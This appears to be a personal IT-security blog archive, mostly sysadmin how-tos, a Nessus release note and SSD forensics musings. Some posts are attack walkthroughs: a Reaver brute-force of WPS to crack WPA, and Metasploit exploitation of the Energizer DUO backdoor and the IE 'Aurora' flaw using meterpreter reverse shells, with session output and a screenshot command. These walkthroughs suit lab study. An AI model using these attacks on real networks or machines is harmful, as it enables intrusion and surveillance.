Thursday, 16 February 2012

Nessus 5.0 Released

Nessus 5.0 delivers introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include:

Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up-and-running, completely configured in minutes.
Nessus 5.0 delivers introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include:
Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up-and-running, completely configured in minutes.

Rapid policy creation – More than two dozen new plugin filters make it fast and easy to create policies for targeted scans. Selecting multiple filter criteria, such as, vulnerability publication date, public vulnerability database ID, information assurance vulnerability alert (IAVA), and more, makes it simple to identify easily-exploitable vulnerabilities.

Industry-leading efficiency – Real-time scan results combined with on-the-fly filtering allow users to quickly see risk level and act upon vulnerability data without waiting for the scan to complete. One-click navigation makes it easy to jump from critical vulnerability to vulnerable host to the details of the vulnerability. Five severity levels quickly separate informational data from actionable results.

Fully customizable reports – Multiple filters, results management, and new pre-configured report formats allow users to produce targeted reports tailored to fit the needs/interests of executives, systems administrators, and auditors. Users can also combine multiple report templates into a single, comprehensive report, which can be delivered in a variety of formats, including PDF.

“Tenable’s dynamic library of now nearly 50,000 individual vulnerability and configuration checks is updated continuously to ensure the accuracy and relevance of Nessus scans and audits. Our next-generation scanner continues to be recognized by security professionals, network penetration testing teams, and auditors as the de facto standard for vulnerability and configuration assessment.” said Ron Gula, CEO and CTO of Tenable Network Security. “Version 5.0 builds on the solid foundation Nessus has established for quality and accuracy, and now makes it easier and faster to install and use.”

download and info :

Sunday, 8 January 2012

BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introdused to allow home users with little or no knowelage of wirelss security to set up a wireless network encrypted with WPA or WPA2 as well as making it easy to add new devices to an existing network without entering long passwords/passphrases.

In this example I will be using BackTrack 5 R1 Gnome 32 bit.

You can either boot off the DVD or install it. The creating of a bootable DVD and installing BackTrack is beyond the scope of this tutorial. 

I'm assuming you have two network connections one for internet access and one with your wireless adapter that we will be using in this test. In my case I'm using both a wired and wireless adapter.
Open up a terminal and run the following commands

apt-get update
apt-get install reaver

Next we need to find out what interface is assigned to your wireless card using the following command.


In my case wlan0
Next we need to put the wireless card in to monitor mode.

airmon-ng start wlan0

The monitor interface created is mon0
Next we need to find the BSSID of our test router we want to crack

airodump-ng wlan0

In my case 00:11:22:33:44:55
Next we launch reaver

reaver -i mon0 -b 00:11:22:33:44:55 -vv

Now sit back and wait, grab a cup or two of coffee, and let reaver do its thing. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my case it took just over 2 hours.

Thursday, 29 December 2011

Run Chrome as root in BackTrack 5

Download Chrome from the Google Chome site for the version you need.

In my case

Install the Chrome version you downloaded which should be a .deb file using the command.
Substitute for the version you downloaded
dpkg -i google-chrome-stable_current_i386.deb
However when I launched Chrome I got the following error.

Google Chrome can not be run as root 
I edited the following file /usr/bin/google-chrome using your favourite text editor in my case I typed the following  from a terminal.

gedit /usr/bin/google-chrome
Go to the very bottom of the text and add   --user-data-dir

Make sure you put a space between the "$@"  and the --user-data-dir

Last step is to Save and Quit the text editor

Thursday, 6 October 2011

Installing Libre Office in Backtrack 5R1

Below are two possible options for installing LibreOffice in Backtrack 5R1

Using the PPA installation of LibreOffice

root@bt:~# add-apt-repository ppa:libreoffice/ppa
root@bt:~# apt-get update
root@bt:~# apt-get install libreoffice 

Downloading the install package from the LibreOffice website and installing manually

Download the main install package from the LibreOffice website ( ) and if need your required language version to a temporary folder. In my case /root/Downloads

Extract the main install file. In this example the install file.

tar zxvf LibO_3.4.2_Linux_x86_install-deb_en-US.tar.gz

Optionial extract your local language pack. In my case en-GB

tar zxvf LibO_3.4.3_Linux_x86_langpack-deb_en-GB.tar.gz

Install the main package

root@bt:~# cd Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US
root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US# cd DEBS
root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS# sudo dpkg -i *.deb

Install the Menu items

root@bt:~/Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS# cd desktop-integration
root@bt:~/Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS/desktop-integration# sudo dpkg -i *.deb

Optional install the language pack.

root@bt:~# cd Downloads/LibO_3.4.3_Linux_x86_langpack-deb_en-GB
root@bt:~/Download/LibO_3.4.3_Linux_x86_langpack-deb_en-GB# cd DEBS
root@bt:~/Download/LibO_3.4.3_Linux_x86_langpack-deb_en-GB/DEBS# sudo dpkg -i *.deb

LibreOffice is now installed. Enjoy

Tuesday, 21 June 2011

Has UK gov lost the census to Lulzsec?

2011 UK census data apparently hacked.  I'll be keep an eye on  's Twitter feed for confirmation.

Thursday, 13 May 2010

How To Reset A Forgotten root Password On A Linux Virtual Machine on XenServer

I recently had to carry out some maintenance on a Linux server hosted on our XenServer. However I had forgotten the root password. Lesson learned to save password in a secure location such as an encrypted usb stick or in an encrypted file on my cell phone. Anyway I digress, on the make it just work section.

From Xencenter select the virtual machine you want to boot in single user mode.

Shut down your virtual machine using the Xencenter controls.

Right click on the Boot Options for your virtual machine and select Properties.

Change the OS Boot Parameters to

rw init=/bin/bash

NOTE If you already have something in the OS Boot Parameters you will need to take note of this as you will need to put it back once the password reset is complete.

Save and Start your virtual machine

Your system will now boot up in single user mode.

Now its time to change your password

machinename# passwd root

Type in your new password you will then be asked to confirm it.

Your password has now been reset.
Shutdown your virtual machine.
machinename# shutdown -h now

Now go Back to the Xencenter Application and Startup options and remove rw init=/bin/bash and change it back to whatever was there before.
Start up your virtual machine and you should be able to logon with your new root password.

Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhVL.exe...

[*] Sending stage (747008 bytes)

[*] Meterpreter session 1 opened ( ->

meterpreter > getuid
Server username: HACKME\TestUser

Wednesday, 20 January 2010

Reproducing the "Aurora" IE Exploit

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP:
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened ( ->

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Monday, 2 November 2009

Dual Boot Windows XP and BackTrack with Encryption

A number of people have asked me how I am dual booting Windows XP and BackTrack and have both operating systems installed on a fully encrypted partitions. The follow is a rough guide to setting it up. It may not be the best way of setting up this type of configuration but if works for my needs. Your experiences may vary. My laptop has a 200GB IDE hard drive in it. Please adjust for your spec.

Before starting you may want to wipe your entire hard drive.
  • dd if=/dev/urandom of=/dev/hda
Windows XP encrypted with TrueCrypt 6.3
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted

Install Windows XP first (200GB)

Boot off BackTrack4 cd. fdisk /dev/hda create a /boot partition (hda2) 200MB create a / partition (hda3) remainder of disk. Setup the encrypted partition.

  • modprobe aes-i586
  • cryptsetup luksFormat /dev/hda cryptsetup luksOpen /dev/hda3
  • rootmkfs.ext3 –j –O extent /dev/mapper/root

Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root

Do not reboot just yet we need to modify a few files.

  • mkdir /mnt/root
  • mount /dev/mapper/root /mnt/root
  • mount /dev/hda2 /mnt/root/boot
  • chroot /mnt/root
  • mount –t proc proc /proc
  • mount –t sysfs sys /sys

Next we need to edit the /etc/crypttab file. I'm going to keep the name root for / .
  • root /dev/hda3 none luks

Next step is to edit /etc/fstab. The / should look like this. Amend if needed.

  • /dev/mapper/root / ext3 relatime,errors=remount-ro 0 1 /dev/hda2 /boot ext3 defaults 0 0

Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.




Update your initrd with the following command.
  • update-initramfs –k all –c
I got an error when it tried to create an initrd file for kernel but BackTrack4 comes with so as long as you get no errors on the initrd for you should be good.

Now time to fix grub.
  • cd /boot/grub/ nano menu.lst

Your BackTrack section should look like this.

  • title BackTrack 4
  • uuid Your uuid of boot partition
  • kernel /vmlinuz- root=/dev/mapper/root ro initrd /initrd.img- quiet
Next we need install grub
  • grub-install /dev/hda
exit from the chroot environment. Unmount /mnt/root/boot and /mnt/root

Using TrueCrypt I fully encrypted the windows system partition (not full disk encryption) through TrueCrypt 6.3 and let it write its bootloader to the MBR. This will overwrite GRUB.

Don't worry we'll fix this later.

Boot with BackTrack cd and copied the truecrypt bootloader from the MBR to a file in the /boot partition. In my case hda2

I used these commands to do so:

  • dd if=/dev/hda of=/mnt/boot/truecrypt.mbr count=1 bs=512
  • dd if=/dev/hda of=/mnt/boot/truecrypt.backup count=8 bs=32256

Reinstalled grub to the MBR using these commands:
  • sudo grub
  • install (hd0,1)/grub/stage1 (hd0) (hd0,1)/grub/stage2 0x8000 p
Added a chainloader to the menu.lst Windows XP entry to point to the truecrypt bootloader within the /boot partition:

title XP
rootnoverify (hd0,0)
chainloader (hd0,1)/truecrypt.mbr

Monday, 21 September 2009

Dell R900 SQL Server 2005 Fails To Install

As part of a new platform deployment I recently took delivery of a number of servers one of which was a DELL R900 with 4x 6 core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information , see the SQL Books Online....

Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However it it not possible to slipstream a service pack into SQL 2005 install cd / dvd. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.

Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.

Thursday, 13 August 2009

SSD Drives and IT Forensics - Update

In previous post The implication of new firmware released for OCZ SSD on computer forensics I asked a number of questions. The post was also send to an internal mailing list where I work. A number of responses came back and I thought I'd share them

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.

2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?

No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSD's now have the ability to use TRIM under win7, linux, OSX but only where the operating system, firmware, and associated software are correctly installed.

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

Yes, see above, as TRIM is not supported under the linux kernel (and would never be supported for a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially windows 7).

Wednesday, 12 August 2009

The implication of new firmware released for OCZ SSD on computer forensics

UPDATE - Questions answered

On my daily trawl through various feeds, thanks Google Reader for making this so easy, I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the write from a performance standpoint the IT Forensics voice in my head was saying this could make my job more interesting.

This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive even if the drive has been used over a long period of time . The flash memory used on the SSD drive is comprised of cells that usually contain 4KB pages that are arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little even if it fills only a single page in the block,the entire block must be re-written.

This is because a memory cell has to be empty to have data written on it, even if it's only partially filled. The data already contained in the cell has to be copied to the cache, the new data to be added is then added to the cache, the old data in the cell is then erased and the new information in the cache copied to the memory cell. As time passes and all the cells are partially filled with old data,the SSD slows down as new data has to be added using the same process.

Basically what this means is that the way many SSD drives write data is not very efficient, and leaves all kinds of un-used data all over the place, which later causes slowdowns when it is needlessly rewritten.

Now what the new firmware from OCZ does is to apparently
fix this while the drive is idle by clearing used memory cells of unneeded or unwanted data on a regular basis so they are instantly available for future use.

From a forensics perspective could this be considered a built-in "wiping" function on SSD drives. It is also worth noting that this could become the standard for all SSD drives.

This raises the following questions:

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.

UPDATE - Questions answered

Monday, 10 August 2009

Root on HTC Magic


1 Click Android Rooting ...

I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.

Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.

I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.

After extracting the SDK to C:\AndroidSDK\ and the images to C:\AdnroidSDK\tools

I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the usb cable, open a command prompt and and run the following from your AndroidSDK\tools folder:

fastboot boot recovery-new.img

Your phone will reboot and you will be presented by the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes backups of your phones system,boot,recovery,data,misc and cache images will be copied to the phones SD card.

I then followed The Unlockr's Guide, unfortunately this didn't work for me and my phone just hung on at the Vodafone splash screen. I left it for about 20mins thinking that maybe it was doing some post load installs, but no not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: How do I get the backup back on to my phone. I tried to re-flash it by first wiping the failed flash

fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot

No sure luck all the fastboot flash options returned the same error:

FAILED (remote: signature verify fail)

Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools

So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools

fastboot boot recovery-RAv1.2.0G.img

The phone will boot the recovery image and you will notice and option titled

Nandroid V2.2 Restore

Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.

Monday, 3 August 2009

Slipstream or integrate Office 2007 Service Pack 2 (SP2)

If like me you update and deploy software to new workstation on a regular basis you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing office from a network share and have already copied the entire contents of the CD to this folder.

Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:

c:\updates\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates

Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.

Enabling AHCI after installing Windows XP x64

Download the OS Pre-Install sata drivers and extract to a temporery location on the machine (c:\tmp).

Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the Driver folder (c:\tmp\) and highlight the iastor.inf file, hit Open Select OK

Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When system boots enter the bios, navigate to the SATA Operation option or equivlant and set it to AHCI
Verify your sata ports enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.